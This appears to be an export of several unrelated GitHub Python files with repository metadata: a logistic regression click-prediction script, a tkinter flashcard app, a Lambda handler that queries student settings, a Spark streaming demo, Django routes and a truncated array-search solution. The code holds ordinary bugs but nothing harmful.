dataset_full[column].fillna(dataset_train[column].median(), inplace = True)\r\n\r\nc = dataset_full.isnull().sum() \r\n\r\n\r\n\r\n###########################################\r\n## Outlier Detection & Correction \r\n########################################### \r\n\r\nfor column in dataset_train:\r\n if (dataset_train[column].dtype != 'object'):\r\n q = dataset_train[column].quantile(0.99)\r\n r = dataset_train[column].quantile(0.01)\r\n dataset_full[column] = np.where(dataset_full[column] > q, q, dataset_full[column])\r\n dataset_full[column] = np.where(dataset_full[column] < r, r, dataset_full[column])\r\n \r\n \r\n# In this dataset there are certain columns which contain all \r\n# nulls (in full dataset or train ) so we need to remove all those columns\r\nfor i in c.index:\r\n if(c[i]>0):\r\n dataset_full.drop(i, axis=1, inplace=True)\r\n \r\n \r\n# Dropping the Loan ID key fields as it is just for identification and does not add any value to the analysis\r\ndataset_full.drop(['session_id','DateTime'], axis=1, inplace=True)\r\n\r\n\r\n\r\n#####################################################################\r\n## Creating bins using pd.crosstabs and looking closely at the data\r\n##################################################################### \r\nfor column in dataset_full:\r\n if(dataset_full[column].dtype == 'object'):\r\n \r\n print('before >>>>> ',column,'::::',dataset_full[column].nunique())\r\n a = pd.crosstab(dataset_full[column], dataset_full['is_click'], normalize='index')\r\n\r\n temp_desc = a.index[a[0] == 0]\r\n dataset_full[column] = np.where(dataset_full[column].isin(temp_desc),column+\"_0\",dataset_full[column]) \r\n \r\n \r\n temp_desc = a.index[a[0] ==1] \r\n dataset_full[column] = np.where(dataset_full[column].isin(temp_desc),column+\"_1\",dataset_full[column]) \r\n\r\n print('after >>>>> ',column,'::::',dataset_full[column].nunique())\r\n \r\n \r\n###########################################################################\r\n# Dummy variable creation\r\n# From above step we come to know that there is no category ratinalization \r\n# so we can directly hop onto dummy creation step\r\n########################################################################### \r\n \r\n# Create dummy variables from all indep categorical variables\r\n\r\n# Step 1: Identify categorical vars\r\nCateg_Vars = dataset_full.loc[:,dataset_full.dtypes == object].columns\r\n\r\n# Step 2: Create dummy vars\r\nDummy_Df = pd.get_dummies(dataset_full[Categ_Vars].drop(['source'], axis = 1), drop_first=True, dtype=int)\r\nDummy_Df.columns\r\nDummy_Df.shape\r\nDummy_Df.dtypes\r\n\r\n# Step 3: Append the Dummy_Df with dataset_full. Call it dataset_full2\r\ndataset_full2 = pd.concat([dataset_full, Dummy_Df], axis = 1)\r\ndataset_full2.shape\r\ndataset_full2.dtypes\r\n\r\n# Step 4.1: Drop all the irrelavant and categorical columns (Do NOT drop Source column - We need it for sample splitting)\r\nCols_To_Drop = Categ_Vars.drop('source') # Ensure you discard 'Source' column from \"columns to drop\"\r\n\r\n# Step 4.2\r\ndataset_full2.drop(Cols_To_Drop, axis=1, inplace=True)\r\ndataset_full2.shape\r\ndataset_full2.columns\r\n\r\n\r\n########################\r\n# Sampling\r\n########################\r\n\r\n# intercept = 1 always gets multiplied at the backend and for easier \r\n# explanability we give value of 1 as its multiplication is easy\r\ndataset_full2['Intercept'] = 1\r\n\r\n# Divide the data into Train and Test based on Source column and \r\n# make sure you drop the source column\r\nTrain = dataset_full2.loc[dataset_full2.source == \"Train\",:].drop('source', axis = 1).copy()\r\nTrain.shape\r\nTest = dataset_full2.loc[dataset_full2.source == \"Test\",:].drop('source', axis = 1).copy()\r\nTest.shape\r\n\r\n#####################################################\r\n# Divide data into Train_X, Train_Y & Test_X, Test_Y\r\n#####################################################\r\n\r\n# Divide each dataset into Indep Vars and Dep var\r\nTrain_X = Train.drop('is_click', axis = 1).copy()\r\nTrain_Y = Train['is_click'].copy()\r\nTest_X = Test.drop('is_click', axis = 1).copy()\r\nTest_Y = Test['is_click'].copy()\r\n\r\n\r\n########################\r\n# Multicollinearity check\r\n########################\r\n\r\n# Check for VIF\r\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\r\n\r\n\r\ncols_to_drop_vif = []\r\n# All columns with vif value > 10 were earmarked to be dropped from analysis\r\nfor i in range(Train_X.shape[1]-1):\r\n temp_vif = variance_inflation_factor(Train_X.values, i) # Pass Train_X.values and i (col_number)\r\n print(Train_X.columns[i], \": \", temp_vif)\r\n if(temp_vif>10):\r\n print('Since vif value is greater than 10 so dropping the column ',Train_X.columns[i])\r\n cols_to_drop_vif.append(Train_X.columns[i])\r\n \r\nTrain_X.drop(cols_to_drop_vif, axis=1, inplace=True)\r\nTest_X.drop(cols_to_drop_vif, axis=1, inplace=True)\r\n\r\n\r\n########################\r\n# Model building\r\n########################\r\n\r\n# Build logistic regression model (using statsmodels package/library)\r\nimport statsmodels.api as sm\r\nM1 = sm.Logit(Train_Y, Train_X) # (Dep_Var, Indep_Vars) # This is model definition\r\nM1_Model = M1.fit() # This is model building\r\nM1_Model.summary() # This is model output summary\r\n\r\n#################################################\r\n# Manual model selection. \r\n# Drop the most insignificant variable in model \r\n# one by one and recreate the model\r\n# variable with p-score>0.05 is insignificant\r\n################################################\r\n\r\n# Drop city_development_index as its p-score is highest\r\nCols_To_Drop = ['city_development_index']\r\nM2 = sm.Logit(Train_Y, Train_X.drop(Cols_To_Drop, axis = 1)) # (Dep_Var, Indep_Vars)\r\nM2_Model = M2.fit()\r\nM2_Model.summary()\r\n# All significant variables remain after above step so no further below \r\n# commented steps required\r\n\r\n#\r\n## Drop product_B as its p-score is highest\r\n#Cols_To_Drop.append('product_B')\r\n#M3 = sm.Logit(Train_Y, Train_X.drop(Cols_To_Drop, axis = 1)) # (Dep_Var, Indep_Vars)\r\n#M3_Model = M3.fit()\r\n#M3_Model.summary()\r\n#\r\n#\r\n## Drop user_depth as its p-score is highest\r\n#Cols_To_Drop.append('user_depth')\r\n#M4 = sm.Logit(Train_Y, Train_X.drop(Cols_To_Drop, axis = 1)) # (Dep_Var, Indep_Vars)\r\n#M4_Model = M4.fit()\r\n#M4_Model.summary()\r\n\r\n\r\n########################\r\n# Predict on testset from train data\r\n########################\r\n\r\nColumns_To_Use = Train_X.drop(Cols_To_Drop, axis = 1).columns # Indentify important columns from modeling\r\nTest['Test_Prob'] = M2_Model.predict(Test[Columns_To_Use]) # Use Test to store the predicted probs\r\nTest.head()\r\n\r\n\r\n# Classify 0 or 1 based on 0.5 cutoff\r\n# Checked for values > 0.5 and < 0.5 and best result was obtained at 0.5 and \r\n# maintaining universal rule that for binary classifier the best case event \r\n#probabilty is 0.5\r\nimport numpy as np\r\nTest['Test_Class'] = np.where(Test.Test_Prob >= 0.065, 1, 0)\r\nTest.columns\r\n\r\n# Confusion matrix\r\nConfusion_Mat = pd.crosstab(Test.Test_Class, Test.is_click) # R, C format\r\nConfusion_Mat\r\n\r\nConfusion_Mat[0]\r\nConfusion_Mat[0][0]\r\n\r\n# Check the accuracy of the model\r\n((Confusion_Mat[0][0] + Confusion_Mat[1][1])/Test.shape[0])*100\r\n## accuracy = 50.07% with cutoff of 0.065\r\n## accuracy = 85.54% with cutoff of 0.09\r\n## accuracy = 92.46% with cutoff of 0.10\r\n## accuracy = 93.04% with cutoff of 0.11\r\n## accuracy = 93.16% with cutoff of 0.12\r\n## Since we get maximum accuracy and failrly good AUC with cutoff 0.12 we will choose this cutoff\r\n\r\n#############################\r\n### Applying K-Fold Cross Validation\r\n#############################\r\n#from sklearn.model_selection import cross_val_score\r\n#accuracies = cross_val_score(estimator = M2, X = Train_X , y = Train_Y, cv = 10, n_jobs = -1)\r\n#\r\n#accuracies.mean()\r\n\r\n## Since I have used statsmodel Logistic Regression so I will not be able to use Cross Validation\r\n\r\n########################\r\n# AUC and ROC Curve\r\n########################\r\n\r\nfrom sklearn.metrics import roc_curve, auc\r\n\r\n# Predict on train data\r\nTrain['Train_Prob'] = M2_Model.predict(Train[Columns_To_Use])\r\n\r\n\r\n# Calculate FPR, TPR and Cutoff Thresholds\r\nfpr, tpr, thresholds = roc_curve(Train['is_click'], Train['Train_Prob'])\r\n\r\n\r\n# Plot ROC Curve\r\nROC_Df = pd.DataFrame()\r\nROC_Df['FPR'] = fpr \r\nROC_Df['TPR'] = tpr\r\nROC_Df['Cutoff'] = thresholds\r\n\r\n# Plot ROC Curve\r\nimport matplotlib.pyplot as plt\r\nplt.plot(ROC_Df.FPR, ROC_Df.TPR) # (x,y)\r\n\r\n# Area under curve (AUC)\r\nauc(fpr, tpr)\r\n\r\n\r\n#############################\r\n# Predict on actual testset\r\n#############################\r\ntest_file = pd.read_csv('test.csv',sep = ',',low_memory=False)\r\n\r\ntest_final = pd.merge(test_file, df_feat3, how='left', left_on=['user_id'], right_on = ['user_id'])\r\n\r\n\r\n\r\n# Dropping the Loan ID key fields as it is just for identification and does not add any value to the analysis\r\ntest_final_1 = pd.DataFrame()\r\ntest_final_1['session_id'] = test_final['session_id']\r\ntest_final.drop(['session_id','DateTime'], axis=1, inplace=True)\r\n\r\n##************************\r\n##************************\r\n########################\r\n# Missing value imputation (NAs)\r\n########################\r\n\r\n# First check for NAs\r\n# returns the sum of NA values column wise\r\nb = test_final.isnull().sum() \r\n\r\n# For Continuous vars: Impute with median\r\n# For Categorical vars: Impute with mode\r\n\r\nfor column in test_final:\r\n if( (test_final[column].dtype == 'object') & (b[column] > 0)):\r\n test_final[column].fillna(test_final[column].mode()[0], inplace = True)\r\n elif ((test_final[column].dtype != 'object') & (b[column] > 0)):\r\n test_final[column].fillna(test_final[column].median(), inplace = True)\r\n\r\nc = test_final.isnull().sum() \r\n\r\n###########################################\r\n## Outlier Detection & Correction - to do \r\n########################################### \r\n\r\nfor column in test_final:\r\n if (test_final[column].dtype != 'object'):\r\n q = test_final[column].quantile(0.99)\r\n r = test_final[column].quantile(0.01)\r\n test_final[column] = np.where(test_final[column] > q, q, test_final[column])\r\n test_final[column] = np.where(test_final[column] < r, r, test_final[column])\r\n \r\n \r\n# In this dataset there are certain columns which contain all \r\n# nulls (in full dataset or train ) so we need to remove all those columns\r\nfor i in c.index:\r\n if(c[i]>0):\r\n test_final.drop(i, axis=1, inplace=True)\r\n \r\n \r\n\r\n\r\n###########################################################################\r\n# Dummy variable creation\r\n# From above step we come to know that there is no category ratinalization \r\n# so we can directly hop onto dummy creation step\r\n########################################################################### \r\n \r\n# Create dummy variables from all indep categorical variables\r\n\r\n# Step 1: Identify categorical vars\r\nCateg_Vars = test_final.loc[:,dataset_full.dtypes == object].columns\r\n\r\n# Step 2: Create dummy vars\r\nDummy_Df = pd.get_dummies(test_final[Categ_Vars], drop_first=True, dtype=int)\r\nDummy_Df.columns\r\nDummy_Df.shape\r\nDummy_Df.dtypes\r\n\r\n# Step 3: Append the Dummy_Df with dataset_full. Call it dataset_full2\r\ntest_final2 = pd.concat([test_final, Dummy_Df], axis = 1)\r\ntest_final2.shape\r\ntest_final2.dtypes\r\n\r\n\r\n# Step 4.2\r\ntest_final2.drop(Categ_Vars, axis=1, inplace=True)\r\ntest_final2.shape\r\ntest_final2.columns\r\n\r\n########################\r\n# Sampling\r\n########################\r\n\r\n# intercept = 1 always gets multiplied at the backend and for easier \r\n# explanability we give value of 1 as its multiplication is easy\r\ntest_final2['Intercept'] = 1\r\n##************************\r\n##************************\r\n\r\n\r\n\r\n\r\ntest_final2['Test_Prob'] = M2_Model.predict(test_final2[Columns_To_Use]) # Use Test to store the predicted probs\r\ntest_final2.head()\r\n\r\n# Classify 0 or 1 based on 0.5 cutoff\r\n# Checked for values > 0.5 and < 0.5 and best result was obtained at 0.5 and \r\n# maintaining universal rule that for binary classifier the best case event \r\n#probabilty is 0.5\r\nimport numpy as np\r\ntest_final2['is_click'] = np.where(test_final2.Test_Prob >= 0.065, 1, 0)\r\n\r\ntest_result = pd.concat([test_final_1['session_id'], test_final2['is_click']], axis = 1)\r\n\r\ntest_result.shape \r\n \r\ntest_result1 = pd.DataFrame()\r\n\r\ntest_result1 = pd.merge(test_file, test_result.drop_duplicates(), on='session_id', how = 'inner')\r\n\r\ntest_result1.shape\r\n\r\ntest_result1.to_csv('submission.csv', index=False)\r\n\r\n\r\n## After this step I used below R code to clean submission file as it contained more records \r\n##than the session ids \r\n#Wroking with external files\r\n#getwd() # to know the default working directory or folder for R\r\n#setwd(\"D:/Analytics_Vidhya_Research/AM_Expert_2018 Competition\")\r\n#getwd()\r\n#\r\n#Data1 <- read.csv(\"submission_r.csv\")\r\n#Data2 <- read.csv(\"test.csv\")\r\n#\r\n#library(sqldf)\r\n#Data3 <- sqldf(\"SELECT DISTINCT a.session_id ,count(1) FROM Data1 a group by session_id having count(1)>1\")\r\n#\r\n#Data4 <- sqldf(\"SELECT DISTINCT a.session_id ,is_click FROM Data1 a\r\n# where a.session_id in (select session_id from Data3) and is_click = 1 order by session_id, is_click\")\r\n#\r\n#Data5 <- sqldf(\"SELECT DISTINCT a.session_id ,is_click FROM Data1 a\r\n# where a.session_id in (select session_id from Data3) and is_click = 1 \r\n# union all\r\n# SELECT DISTINCT a.session_id ,is_click FROM Data1 a\r\n# where a.session_id not in (select session_id from Data3) \")\r\n#write.csv(Data5, file = \"MyData.csv\",row.names=FALSE)\r\n\r\n\r\n","repo_name":"drml007/mygithub","sub_path":"amexpert2018-master/amexpert2018-master/amex_final2.py","file_name":"amex_final2.py","file_ext":"py","file_size_in_byte":16250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3349454782","text":"# --------------------IMPORTING ALL MODULES-------------------- #\nimport tkinter\nfrom PIL import ImageTk, Image\nimport pandas\nimport random\n# --------------------DECLARING VARIABLES-------------------- #\ncard_front_tf = True\ndicty = {}\n\n# --------------------IMPORTING CSV-------------------- #\ntry:\n french_words = pandas.read_csv('data/data.csv', header=None, index_col=0, squeeze=True).to_dict()\nexcept FileNotFoundError:\n french_words = pandas.read_csv('data/french_words.csv', header=None, index_col=0, squeeze=True).to_dict()\nrandom_word = random.choice((list(french_words)))\n# --------------------DEFINING FUNCTIONS-------------------- #\n\n\ndef flip_card():\n global card_front_tf, french_words\n global random_word\n\n if card_front_tf:\n del french_words[random_word]\n random_word = random.choice((list(french_words)))\n canvas.create_image(300, 200, anchor=\"center\", image=card_back)\n card_front_tf = False\n canvas.create_text(300, 150, fill=\"white\", font=\"Times 20 italic\", text=\"French\")\n canvas.create_text(300, 200, fill=\"white\", font=\"Times 20 bold\", text=random_word)\n else:\n canvas.create_image(300, 200, anchor=\"center\", image=card_front)\n card_front_tf = True\n canvas.create_text(300, 150, fill=\"black\", font=\"Times 20 italic\", text=\"English\")\n canvas.create_text(300, 200, fill=\"black\", font=\"Times 20 bold\", text=french_words[random_word])\n\n\ndef timed_flip(tf):\n global dicty\n if not tf:\n dicty[random_word] = french_words[random_word]\n df = pandas.DataFrame(list(dicty.items()))\n df.to_csv(\"data/data.csv\", header=False, index=False)\n flip_card()\n window.after(3000, flip_card)\n\n\n\n# --------------------DECLARING ALL VARIABLES-------------------- #\nBACKGROUND_COLOR = \"#B1DDC6\"\n\n# --------------------CREATING WINDOW-------------------- #\nwindow = tkinter.Tk()\nwindow.configure(bg=BACKGROUND_COLOR, padx=0, pady=50)\nwindow.title(\"Flash Cards\")\n\n# -----setting icon----- #\nicon = tkinter.PhotoImage(file=\"icon.png\")\nwindow.iconphoto(False, icon)\n\n# --------------------CREATING ALL IMAGES-------------------- #\n\n# -----back of card----- #\ncard_back_img = Image.open(\"images/card_back.png\") # reference path\ncard_back_img = card_back_img.resize((500, 300), Image.ANTIALIAS) # resizing and anti-aliasing\ncard_back = ImageTk.PhotoImage(card_back_img) # turning into tkinter photo class\n\n# -----front of card----- #\ncard_front_img = Image.open(\"images/card_front.png\") # reference path\ncard_front_img = card_front_img.resize((500, 300), Image.ANTIALIAS) # resizing and anti-aliasing\ncard_front = ImageTk.PhotoImage(card_front_img) # turning into tkinter photo class\n\n# -----right button----- #\nright_button_img = Image.open(\"images/right.png\") # reference path\nright_button_img = right_button_img.resize((100, 100), Image.ANTIALIAS) # resizing and anti-aliasing\nright_button = ImageTk.PhotoImage(right_button_img) # turning into tkinter photo class\n\n# -----wrong button----- #\nwrong_button_img = Image.open(\"images/wrong.png\") # reference path\nwrong_button_img = wrong_button_img.resize((100, 100), Image.ANTIALIAS) # resizing and anti-aliasing\nwrong_button = ImageTk.PhotoImage(wrong_button_img) # turning into tkinter photo class\n\n# TODO: Make this DRY\n\n# --------------------CREATING CANVAS-------------------- #\ncanvas = tkinter.Canvas(width=600, height=400, bg=BACKGROUND_COLOR, highlightthickness=0) # setting canvas size\n\n# --------------------LAYING IMAGE ON CANVAS-------------------- #\ntimed_flip(True)\n\n# --------------------CREATING BUTTONS-------------------- #\nrb = tkinter.Button(image=right_button, highlightthickness=0, borderwidth=0, bd=0, bg=BACKGROUND_COLOR,\n command=lambda: timed_flip(True))\nwb = tkinter.Button(image=wrong_button, highlightthickness=0, borderwidth=0, bd=0, bg=BACKGROUND_COLOR,\n command=lambda: timed_flip(False))\n\n# --------------------LAYING OUT OBJECTS-------------------- #\ncanvas.grid(row=1, column=0, columnspan=2)\nrb.grid(row=2, column=0)\nwb.grid(row=2, column=1)\n\n# --------------------MAIN LOOP-------------------- #\ntkinter.mainloop()\n\n# --------------------END-------------------- #\n","repo_name":"The-Briel-Deal/CSV_Flash_Card_Quizer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18020833185","text":"from package.query_db import query\nfrom package.lambda_exception import LambdaException\n\ndef get_student_settings_handler(event, context):\n\n student_id = int(event['student_id'])\n student_id_param = [{'name' : 'student_id', 'value' : {'longValue' : student_id}}]\n\n student_sql = \"SELECT user_id FROM students WHERE student_id = :student_id\"\n try:\n existing_student = query(student_sql, student_id_param)['records']\n\n except Exception as e:\n raise LambdaException(\"500: Unable to confirm that student exists, \" + str(e))\n\n if len(existing_student) <= 0:\n raise LambdaException(\"404: Student does not exist\")\n \n\n response = {}\n error_messages = []\n\n users_sql = \"SELECT first_name, last_name, email, preferred_name, picture, bio, pronouns, gender, phone FROM users WHERE id = :student_id;\"\n user_data = []\n try:\n user_data = query(users_sql, student_id_param)['records'][0]\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 16\")\n\n response['first_name'] = user_data[0]['stringValue']\n response['last_name'] = user_data[1]['stringValue']\n response['email'] = user_data[2]['stringValue']\n \n if 'stringValue' in user_data[3]:\n response['preferred_name'] = user_data[3]['stringValue']\n else:\n response['preferred_name'] = None\n \n if 'stringValue' in user_data[4]: \n response['picture'] = user_data[4]['stringValue']\n else:\n response['picture'] = None\n \n if 'stringValue' in user_data[5]: \n response['bio'] = user_data[5]['stringValue']\n else:\n response['bio'] = None\n \n if 'stringValue' in user_data[6]: \n response['pronouns'] = user_data[6]['stringValue']\n else:\n response['pronouns'] = None\n \n if 'stringValue' in user_data[7]: \n response['gender'] = user_data[7]['stringValue']\n else:\n response['pronouns'] = None\n \n if 'stringValue' in user_data[8]: \n response['phone'] = user_data[8]['stringValue']\n else:\n response['phone'] = None \n\n\n students_sql = \"SELECT grad_year, resume, grad_student FROM students WHERE student_id = :student_id;\"\n student_data = []\n try:\n student_data = query(students_sql, student_id_param)['records'][0]\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 60\")\n\n if 'longValue' in student_data[0]: \n response['grad_year'] = student_data[0]['longValue']\n else:\n response['grad_year'] = None\n \n if 'stringValue' in student_data[1]:\n response['resume'] = student_data[1]['stringValue']\n else:\n response['resume'] = None\n \n if 'booleanValue' in student_data[2]:\n response['grad_student'] = student_data[2]['booleanValue']\n else:\n response['grad_student'] = None\n\n\n colleges_sql = \"SELECT college FROM college C, student_college SC WHERE SC.student_id = :student_id AND C.college_id = SC.college_id\" \n try:\n colleges_data = query(colleges_sql, student_id_param)['records']\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 81\")\n\n colleges = []\n if len(colleges_data) > 0:\n for college in colleges_data:\n colleges.append(college[0]['stringValue'])\n response['college'] = colleges\n else:\n response['college'] = None\n\n\n links_sql = \"SELECT link_id FROM user_link WHERE user_id = :student_id\"\n student_link_ids = []\n try:\n student_link_ids = query(links_sql, student_id_param)['records']\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 98\")\n\n if len(student_link_ids) > 0:\n student_link_ids = student_link_ids[0]\n link_ids = str(student_link_ids[0]['longValue'])\n for link_id in student_link_ids[1:]:\n link_ids += \" OR link_id\" + str(link_id['longValue'])\n\n student_links_sql = \"SELECT link_type FROM link WHERE link_id = \" + link_ids + \";\"\n print(student_links_sql)\n try:\n student_links = query(student_links_sql)['records'][0]\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 111\")\n\n links = []\n for link in student_links:\n links.append(link['stringValue'])\n\n response['links'] = links\n\n\n majors_sql = \"SELECT major_id FROM student_majors WHERE student_id = :student_id;\"\n student_major_ids = []\n try:\n student_major_ids = query(majors_sql, student_id_param)['records']\n \n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 126\")\n\n if len(student_major_ids) > 0:\n student_major_ids = student_major_ids[0]\n major_ids = str(student_major_ids[0]['longValue'])\n for major_id in student_major_ids[1:]:\n major_ids += \" OR major_id = \" + str(major_id['longValue'])\n \n student_majors_sql = \"SELECT major FROM major WHERE major_id = \" + major_ids + \";\"\n try:\n student_majors = query(student_majors_sql)['records'][0] \n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 139\")\n\n majors = []\n for major in student_majors:\n majors.append(major['stringValue'])\n\n response['major'] = majors\n \n else:\n response['major'] = None\n\n\n minors_sql = \"SELECT minor_id FROM student_minors WHERE student_id = :student_id;\"\n student_minor_ids = []\n try:\n student_minor_ids = query(minors_sql, student_id_param)['records']\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 157\")\n\n if len(student_minor_ids) > 0:\n student_minor_ids = student_minor_ids[0]\n minor_ids = str(student_minor_ids[0]['longValue'])\n for minor_id in student_minor_ids[1:]:\n minor_ids += \" OR minor_id = \" + str(minor_id['longValue'])\n \n student_minors_sql = \"SELECT minor FROM minor WHERE minor_id = \" + minor_ids + \";\"\n try:\n student_minors = query(student_minors_sql)['records'][0]\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 170\")\n\n minors = []\n for minor in student_minors:\n minors.append(minor['stringValue'])\n\n response['minor'] = minors \n \n else:\n response['minor'] = None\n\n\n notification_sql = \"SELECT notification_type_id FROM notification_preferences WHERE user_id = :student_id;\"\n notification_type_ids = []\n try:\n notification_type_ids = query(notification_sql, student_id_param)['records']\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 187\")\n\n if len(notification_type_ids) > 0:\n notification_type_ids = notification_type_ids[0]\n notification_ids = str(notification_type_ids[0]['longValue'])\n for notification_id in notification_type_ids[1:]:\n notification_ids += \" OR notification_type_id = \" + str(notification_id['longValue'])\n\n student_notification_pref_sql = \"SELECT notification_type_name FROM notification_type WHERE notification_type_id = \" + notification_ids + \";\"\n try:\n student_notification_prefs = query(student_notification_pref_sql)['records']\n\n except Exception as e:\n error_messages.append(str(e) + \" get_student_settings.py, line 199\")\n\n notification_prefs = []\n for pref in notification_prefs:\n notification_prefs.append(pref['stringValue'])\n\n response['notification_preferences'] = notification_prefs\n\n\n\n if len(error_messages) > 0:\n response['statusCode'] = 500\n response['errorMessage'] = error_messages\n return response\n else:\n response['statusCode'] = 200\n return response","repo_name":"cicscareers/320-S20-Track1","sub_path":"lambdas/get_student_settings.py","file_name":"get_student_settings.py","file_ext":"py","file_size_in_byte":8067,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"14365246917","text":"import pandas as pd\nfrom geojson import Point, Feature\nimport json\n\nfrom scripts.migrate_dataset import read_dataset_sheet_1\n\n# generating heatmap geojson from objects dataset\ndef gen_geojson():\n df = read_dataset_sheet_1()\n df = df[df['object_point_lat'].notna()]\n features = []\n for _, row in df.iterrows():\n try:\n new_point = Point((float(row['object_point_lng']), float(row['object_point_lat'])))\n feature = Feature(geometry=new_point)\n features.append(feature)\n except Exception as e:\n print('Ошибка!!: ', e)\n\n result = {\n \"type\": \"FeatureCollection\",\n \"crs\": { \"type\": \"name\", \"properties\": { \"name\": \"urn:ogc:def:crs:OGC:1.3:CRS84\" } },\n \"features\": features\n }\n\n return result\n\n# entry point\ndef main():\n output = gen_geojson()\n with open(\"export/heatmap.geojson\", \"w\") as outfile:\n json.dump(output, outfile)\n\nif __name__ == \"__main__\":\n main()","repo_name":"techpotion/leaders2021-utils","sub_path":"scripts/objects_heatmap_geojson.py","file_name":"objects_heatmap_geojson.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27587202128","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql.functions import expr\nfrom streamProcessing.lib.logger import Log4j\n\n\nif __name__ == '__main__':\n # nc -l -p 9999\n spark = SparkSession.builder \\\n .appName(\"Streaming Word Count\") \\\n .master('local[*]') \\\n .config(\"spark.streaming.stopGracefullyOnShutdown\", \"true\") \\\n .config(\"spark.sql.streaming.schemaInference\", \"true\") \\\n .getOrCreate()\n logger = Log4j(spark)\n\n # 1. Read from source: json data files\n # Nella cartella di input devono esserci tutti i file con la stessa estensione!!\n # Pulisci sempre l'input. Nel caso in cui l'opzione cleanSource non sia possibile sui microBatch, creare un job\n # che pulisce la sorgente in input giornalmente\n raw_df = spark.readStream.format(\"json\") \\\n .option(\"host\", \"localhost\") \\\n .option(\"path\", \"input\") \\\n .option(\"maxFilesPerTrigger\", \"1\") \\\n .option(\"cleanSource\", \"delete\") \\\n .load()\n #raw_df.printSchema()\n\n explode_df = raw_df.selectExpr(\"InvoiceNumber\", \"CreatedTime\", \"StoreID\", \"PosID\",\n \"CustomerType\", \"PaymentMethod\", \"DeliveryType\", \"DeliveryAddress.City\",\n \"DeliveryAddress.State\", \"DeliveryAddress.PinCode\",\n \"explode(InvoiceLineItems) as LineItem\")\n #explode_df.printSchema()\n\n # 2. Apply transformations\n flattened_df = explode_df \\\n .withColumn(\"ItemCode\", expr(\"LineItem.ItemCode\")) \\\n .withColumn(\"ItemDescription\", expr(\"LineItem.ItemDescription\")) \\\n .withColumn(\"ItemPrice\", expr(\"LineItem.ItemPrice\")) \\\n .withColumn(\"ItemQty\", expr(\"LineItem.ItemQty\")) \\\n .withColumn(\"TotalValue\", expr(\"LineItem.TotalValue\")) \\\n .drop(\"LineItem\")\n\n # 3. Write to the output source\n invoiceWriterQuery = flattened_df.writeStream \\\n .format(\"json\") \\\n .queryName(\"Flattened Invoice Writer\") \\\n .outputMode(\"append\") \\\n .option(\"path\", \"output\") \\\n .option(\"checkpointLocation\", \"chk-point-dir\") \\\n .trigger(processingTime=\"1 minute\") \\\n .start()\n\n logger.info(\"Flattened Invoice Writer started\")\n invoiceWriterQuery.awaitTermination()\n","repo_name":"alessandro-montefusco/Spark-StructuredStreaming","sub_path":"02-FileStreamDemo/FileStreamDemo.py","file_name":"FileStreamDemo.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34651782345","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.Index, name=\"Index\"),\n path('books', views.Books, name=\"Books\"),\n path('shelfs', views.shelfs, name=\"shelfs\"),\n path('categorys', views.Categorys, name=\"categorys\"),\n\n path('api/Books/', views.BookAPI, name=\"BookAPI\"),\n path('api/Books/add/', views.AddBookAPI, name=\"AddBookAPI\"),\n path('api/Books//', views.BooksDetailsAPI, name=\"BooksDetailsAPI\"),\n path('api/Books/edit//', views.EditBookAPI, name=\"EditBookAPI\"),\n path('api/Books/delete//', views.DeleteBookAPI, name=\"DeleteBookAPI\"),\n\n path('api/Categorys/', views.CategoryAPI, name=\"CategoryAPI\"),\n path('api/Category/add/', views.AddCategoryAPI, name=\"AddCategoryAPI\"),\n path('api/Category//', views.CategorysDetailsAPI, name=\"CategorysDetailsAPI\"),\n path('api/Category/edit//', views.EditCategoryAPI, name=\"EditCategoryAPI\"),\n path('api/Category/delete//', views.DeleteCategoryAPI, name=\"DeleteCategoryAPI\"),\n\n path('api/shelfs/', views.ShelfAPI, name=\"ShelfAPI\"),\n path('api/shelf/add/', views.AddShelfAPI, name=\"AddShelfAPI\"),\n path('api/shelf//', views.ShelfsDetailsAPI, name=\"ShelfsDetailsAPI\"),\n path('api/shelf/edit//', views.EditShelfAPI, name=\"EditShelfAPI\"),\n path('api/shelf/delete//', views.DeleteShelfAPI, name=\"DeleteShelfAPI\"),\n\n \n]","repo_name":"ShrooqAyman/LMS---Django-Rest-Framework-","sub_path":"library/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22282546384","text":"# Suppose an array sorted in ascending order is rotated at some pivot unknown to you beforehand.\n# If found in the array return its index, otherwise return -1\n\n# Input: nums = [4,5,6,7,0,1,2], target = 0\n# Output: 4\n\n# Input: nums = [4,5,6,7,0,1,2], target = 3\n# Output: -1\n\n# time: O(logN)\n# space: O(1)\n\nclass Solution(object):\n def search(self, nums, target):\n # solution 1: 72%\n def minIndex():\n if nums[0] < nums[-1]:\n return 0\n left, right = 0, len(nums)-1\n while (right-left) > 1:\n mid = (left+right)//2\n if nums[mid] < nums[right]:\n right = mid\n elif nums[mid] > nums[left]:\n left = mid\n return max(left, right)\n\n def binarySearch(left, right):\n while left <= right:\n mid = (left+right)//2\n if nums[mid] == target:\n return mid\n elif nums[mid] < target:\n left = mid+1\n else:\n right = mid-1\n return -1\n\n if not nums: return -1\n left, right = 0, len(nums)-1\n 